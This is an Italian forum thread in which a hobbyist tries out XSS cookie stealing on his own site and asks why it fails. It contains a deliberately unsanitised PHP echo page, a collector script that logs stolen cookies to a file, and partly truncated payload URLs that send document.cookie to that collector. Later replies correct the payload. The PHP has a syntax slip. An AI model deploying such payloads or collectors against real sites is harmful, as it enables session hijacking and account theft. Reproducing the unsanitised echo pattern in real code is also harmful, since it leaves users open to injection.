Oppure

Loading
18/06/06 21:08
lomiz
Coltivando la mia grande passione per l'Hacking oggi ho provato a testare sul mio sito il cookie stealing attraverso il Cross Site Scripting.

Ho quindi creato una pagina web sul mio sito, xss.php.

Ho inserito questo codice php:

Codice:
<?php
$var = $_GET['message'];
echo "$var";
?>


Che DOVREBBE essere bugguto e vulnerabile da XSS in quanto non c'è un controllo sul carattere <.

Ho quindi creato un altra pagina: sitomaligno.php

con questo codice:
Codice:
<html>
<head>
<title>prova</title>
</head><body>
<h1>Not Found</h1>
<?php
$data = $_GET['data'];
$fh = fopen("cookie.txt",'a+');
fwrite($fh, "$data"."\n";);
fclose($fh);
?>
<p>dovrei averti rubato i cookie</p>
</body></html>


Adesso se non sbaglio dal momento che la vittima andasse qua:
theninjateam.altervista.org/hacktest/xss/…; + document.cookie</script>

Dovrei avergli rubato i cookie.
Ma tutto cio' non funziona.
Mi direte: "ovvio che non rubi i cookie... non gliel'hai dati..."

Ma non mi si forma alcun file cookie.txt quando se ne dovrebbe formare uno vuoto...

Il bello è che quando vado nel link theninjateam.altervista.org/hacktest/xss/…; + document.cookie</script> non mi carica nemmeno la pagina sitomaligno.php...

Cos'ho sbagliato?
aaa
24/06/06 18:56
radio
beh la prima pagina giustamente non ti scrive nulla se non metti message= dopo il '?'

quindi..

theninjateam.altervista.org/hacktest/xss/…? message=<script>window.location="theninjateam.altervista.org/hacktest/xss/…; + document.cookie</script>

[senza lo spazio, l'ho messo per no llungare tropp la pag ;-)]

cmq io non me ne intendo di xss, ma penso che se non posti "messagge" quindo lui fa l'echo di $_GET["message"] giustametne non ha nulla...
aaa
18/09/06 15:09
nicia
il codice giusto dovrebbe essere il seguente. Dico dovrebbe nel caso abbia saltato qlcs ma nn dovrei. Provandolo in locale funziona!

theninjateam.altervista.org/hacktest/xss/…;

Non è ke mi potresti inviare il codice attraverso il quale si ha un controllo sul carattere <. Vorrei in sostanza la soluzione al problema del furto dei cokies.grazie 1000!!!
aaa